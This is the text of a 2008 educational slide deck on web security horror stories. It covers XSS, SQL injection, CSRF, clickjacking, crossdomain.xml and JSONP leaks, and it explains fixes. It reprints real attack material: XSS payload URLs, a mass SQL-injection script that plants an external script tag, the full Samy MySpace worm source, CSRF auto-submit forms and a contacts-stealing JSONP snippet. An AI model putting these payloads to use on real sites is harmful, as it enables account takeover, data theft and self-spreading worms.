Web Security Horror Stories

Web Security
Horror Stories
The Dire
ctor’s C
ut

Simon Willison, 26th October 2008

The edited version
• On Friday, I spent 15 minutes introducing:
• XSS
• CSRF / login CSRF
• SQL injection
• Clickjacking
• I promised this talk would provide ﬁxes

XSS

• Cross-site scripting
• Attacker injects JavaScript code in to your
site
• Amazingly common
• A single XSS hole on your domain
compromises your security, entirely

Alex Russell:

If you are subject to an XSS,
the same domain policy
already ensures that you’re
f’d. An XSS attack is the
“root” or “ring 0” attack of
the web.

http://www.sitepen.com/blog/2007/01/07/when-vendors-attack-ﬁlm-at-11/

The same origin policy
“The same origin policy prevents a
document or script loaded from one
origin from getting or setting properties
of a document from another origin.
This policy dates all the way back to
Netscape Navigator 2.0.”

https://developer.mozilla.org/en/Same_origin_policy_for_JavaScript

Why?
• Without the same origin policy, I could load
your site in a frame, iframe or popup window
from my site...
• ... and steal data from it
• ... or rewrite it with my own modiﬁcations
• evil.hax.ru should not be able to read
secret-wiki.bigco.intl
• XMLHttpRequest has the same policy

Things I can do if you
have an XSS hole
• Steal your users’ cookies and log in as them
• Show a fake phishing login page on your site
• Embed malware and drive-by downloads
• Perform any action as if I was your user

Two categories of XSS
• Reﬂected
• I embed my JS in a link to your site and
trick your user in to following it
• Persistent
• I get my XSS in to your site’s database
somehow so that it shows up on your pages

http://www.facebook.com/srch.php?nm=xss%00<script>alert('XSS')</script>

http://www.youtube.com/edit_playlist_info?p='%22%3E%3Cscript%
20src=http://ckers.org/s%3E

http://groups.google.com/group/rec.sport.pro-wrestling/browse_thread/
thread/1ab38554971acfc9')&+eval
(alert(document.cookie))&+eval('?tvc=2

http://search.live.com/images/results.aspx?
q=1&ﬁrst=21&FORM=PEIRquot;><script>alert('securitylab.ru')</script>

All from http://xssed.com/

Inexcusable.
Use paramaterised
queries, or an ORM

If you’re gluing SQL
strings together with
string appends,

• Wrong:
• $sql = quot;select * from users where
username = 'quot; . $username . quot;'quot;;

• Right:
• $results = db_query(quot;select * from
users where username = ?quot;,
$username);

Mass XSS via SQL injection
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

http://hackademix.net/2008/04/26/mass-attack-faq/

Preventing XSS
• Use a tool that escapes everything on output
• Only unescape stuff that you know is safe
and you know contains markup you want to
execute
• IE 8 has an XSS ﬁlter; this is irrelevant to
developers
• httpOnly cookies are mostly a waste of time

HTML “sanitisation”
• My users need to be able to add links
and basic styles to their submissions
• “I’ll let them use HTML and remove
anything nasty”
• An extremely common vector for XSS
• MySpace
• LiveJournal
• Almost anyone else who tries

<div id=mycode style=quot;BACKGROUND: url('java
script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode
(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else
{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL
(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split
('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var
AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com')
{document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}
function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV)
{var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1)
{Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function
httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST')
{J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-
Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var
S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn
(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG
+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring
(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e)
{Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new
ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var
AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace
('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv
id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn
(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var
AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS
['interest']=AG;J=getXMLObj();httpSend('/index.cfm?
fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if
(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS
['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter
(AU,'hash');httpSend('/index.cfm?
fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var
AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj
();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?
fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm()
{if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var
AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add
to Friends';httpSend2('/index.cfm?
fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2
(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open
(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-
urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></DIV>

samy is my hero
http://namb.la/popular/

A social network worm

• XSS hole in MySpace’s HTML filter
• When you viewed Samy’s profile...
• JS makes you add him as a friend
• JS uses XMLHttpRequest to add his
exploit to YOUR profile as well

20 hours, 1,005,831
friend requests
(then MySpace crashed)

<div id=mycode style=quot;BACKGROUND: url('java
script:eval(document.all.mycode.expr)')quot; expr=quot;...quot;>

eval('document.body.inne' + 'rHTML');

eval('xmlhttp.onread' + 'ystatechange = callback');

http://namb.la/popular/tech.html

Things to remember
• Whitelist, don’t blacklist
• You’re programming against undocumented
parsing routines in closed-source browsers
• Distrust any library that doesn’t have a unit test
suite a mile long
• http://ha.ckers.org/xss.html
• http://code.google.com/p/html5lib/ is promising

The UTF-7 hole
• Google’s 404 pages used to be served
without a character set specified in the
HTTP headers or <head> section
• Without those hints, IE inspects the first
4096 bytes to “guess” which encoding
is used
• XSS attacks encoded as UTF-7 were
shown on the page and executed by IE

http://shiflett.org/blog/2005/dec/googles-xss-vulnerability

You can’t trust CSS either
• Want to let your users include their own
stylesheet?
• HTC in IE and XBL in Mozilla are both
vectors for JavaScript attacks
• LiveJournal were attacked with this
• A “position: absolute” hack was used to
steal 30,000 MySpace passwords last year

http://community.livejournal.com/lj_dev/708069.html
http://www.securiteam.com/securitynews/6O00M0AHFW.html

Bill Zeller:

“We’ve found CSRF vulnerabilities in
sites that have a huge incentive to
do security correctly. If you’re in
charge of a website and haven’t
speciﬁcally protected against CSRF,
chances are you’re vulnerable”

How does it work?

• It pre-fetches the links on a page in to a
cache, so they’re already loaded when you
click on them

• Links like http://app.example.com/
delete.php?id=5

http://www.37signals.com/svn/archives2/google_web_accelerator_hey_not_so_fast_an_alert_for_web_app_designers.php

That’s also a security hole
<img src=quot;http://app.example.com/delete.php?id=1quot;>
...

So use POST

• You can't create a page that
automatically posts to another site, can
you?

POST will not save you
<form action=quot;http://app.example.com/delete.phpquot;
method=quot;POSTquot;>
<input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;>
<input type=quot;submitquot; value=quot;More kittens please!quot;>
</form>

fofurasfelinas: http://www.ﬂickr.com/photos/fofurasfelinas/9724483/

Or do it with JavaScript
<div style=quot;display: nonequot;>
</form>
</div>

<script>document.forms[0].submit()</script>

Put this in a hidden iframe and your victim won't even
know it happened.

The Digg exploit

• A few years ago, Digg had no CSRF
protection on their “digg this” button
• Self-digging pages!

http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/

The Gmail ﬁlter hack
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

“We believe this is the ﬁrst CSRF
vulnerability to allow the transfer of funds
from a ﬁnancial institution.”

http://www.freedom-to-tinker.com/blog/wzeller/
popular-websites-vulnerable-cross-site-request-
forgery-attacks

Preventing CSRF
• You need to distinguish between form
interactions from your user on your site,
and form interactions from your user on
some other site
• Referrer checking is notoriously
unreliable
• Solution: include a form token (Yahoo!
calls this a “crumb”) proving that the
post came from your site

Crumbs
<input type=quot;hiddenquot; name=quot;crumbquot;
value=quot;856c2f50ddc49fd710f14a406ec1fef652d3c9fquot;>
<input type=quot;submitquot; value=quot;Delete this itemquot;>
</form>

Crumbs
• Should be unique per user (or one user
can use their crumb to attack another)
• Hence should be tied to the user’s
session or login cookie
• Should be changed over time
• Quick and dirty: use sha1(salt + user’s
session ID + timestamp) as the crumb

Protecting the crumb
• Your crumb is now the only thing
protecting you from CSRF attacks
• This is why XSS is “ring 0” for the Web
• With XSS, I can steal your crumb and
run riot across your site
• XSS holes are automatically CSRF holes

Crumbs and Ajax
• Ajax can set HTTP headers; regular forms can’t
• Ajax requests must be from the same domain
• So X-Requested-By: XMLHttpRequest can only
come from your own site
• You can skip your crumb checking for requests
that include that custom header

Login CSRF
• Most login forms skip CSRF protection
• Create a throw-away PayPal account
• Use CSRF to log someone in as “you”
• Hope that they add their credit card or
bank details
• Log in later and steal all of their money!

Clickjacking

http://jeremiahgrossman.blogspot.com/2008/09/cancelled-clickjacking-owasp-appsec.html

Frame-busting
<script type=quot;text/javascriptquot;>
if (top.location != location) {

top.location.href = document.location.href;
}
</script>

• Ironically, turning off JavaScript in your
browser makes you less safe here

crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=quot;*quot; />
</cross-domain-policy>

Putting this at example.com/crossdomain.xml allows Flash applets
on other sites to read your pages and steal your crumbs

Flash can even fake an X-Requested-With: XMLHttpRequest header

That’s why Flickr use api.ﬂickr.com/crossdomain.xml instead

Nasty crossdomain.xml
tricks
loadPolicyFile(quot;http://dom.ext/exit.php?url=http://dom.ext/upl/Xdomain.xmlquot;)

00000000 47 49 46 38 39 61 01 01-01 01 e7 e9 20 3c 63 72 GIF89a.......<cr
00000010 6f 73 73 2d 64 6f 6d 61-69 6e 2d 70 6f 6c 69 63 oss-domain-polic
00000020 79 3e 0a 20 20 3c 61 6c-6c 6f 77 2d 61 63 63 65 y>...<allow-acce
00000030 73 73 2d 66 72 6f 6d 20-64 6f 6d 61 69 6e 3d 22 ss-from domain=quot;
00000040 2a 22 2f 3e 20 0a 20 20-3c 2f 63 72 6f 73 73 2d *quot;/>....</cross-
00000050 64 6f 6d 61 69 6e 2d 70-6f 6c 69 63 79 3e 47 49 domain-policy>..

http://www.hardened-php.net/library/
poking_new_holes_with_ﬂash_crossdomain_policy_ﬁles.html

The PDF hole

• In January 2007, an XSS hole was found
in the Adobe PDF reader itself
• It could execute JavaScript in the
context of the current domain
• Any sites hosting .pdf ﬁles for download
were vulnerable

http://shiﬂett.org/blog/2007/jan/adobe-pdf-xss-vulnerability

You can’t secure your site
100%, because there’s
always a chance a browser
or plugin will screw things
up for you

JSONP rocks!
• http://json-tinyurl.appspot.com/
• http://json-time.appspot.com/
• http://json-head.appspot.com/

http://json-tinyurl.appspot.com/?url=http://example.com/&callback=foo

foo({quot;tinyurlquot;: quot;http://tinyurl.com/kotuquot;, quot;okquot;: true})

• JSONP lets you opt-in to sharing your
site’s data with other sites using JavaScript

• ... so make sure it’s data you want to share

Stealing Google contacts
<script>
function google(a){
var emails;
for(i=1;i<a.Body.Contacts.length;i){
alert(a.Body.Contacts[i].Email);
}
emails = quot;</ol>quot;
document.write(emails);
}
</script>
<script src=quot;http://docs.google.com/data/contacts?
out=js&show=ALL&psort=Affinity&callback=google&max=99999quot;>
</script>

http://blog.adamjacobmuller.com/gmail.txt
http://www.cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/

Jeremiah Grossman:

“If any JSON feed containing
user-sensitive information is
wrapped with a call-back and
has a predictable URL... then
that data is at risk”

http://jeremiahgrossman.blogspot.com/2007/01/gmail-xsrf-json-call-back-hackery.html

Regular JSON?
• That’s not secure either
• In old versions of Firefox, you can redeﬁne
the Array constructor to grab the data
• If your JSON object is an array, the data
can be grabbed using <script src=quot;your-
data-herequot;>

http://directwebremoting.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html

Secure JSON
Use { } as the root, not [ ]

If you’re paranoid about future similar
problems, use an idiom like this one:

while (true) {
{quot;jsonquot;: quot;goes herequot;}
}

And if that wasn’t enough
“More than 70% of people would reveal
their computer password in exchange for
a bar of chocolate, a survey has found.”

http://news.bbc.co.uk/1/hi/technology/3639679.stm

• We have a shared responsibility to teach people
better online security behaviour
• Don’t teach our users to be phished!

Stay informed!
• http://planet-websecurity.org/feed/
• http://www.owasp.org/
• http://simonwillison.net/tags/security/
• http://simonwillison.net/tags/csrf/
• http://simonwillison.net/tags/xss/
• http://simonwillison.net/tags/clickjacking/
• http://simonwillison.net/tags/phishing/

Web Security Horror Stories

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Web Security Horror Stories

Similar to Web Security Horror Stories (20)

More from Simon Willison

More from Simon Willison (20)

Recently uploaded

Recently uploaded (20)

Web Security Horror Stories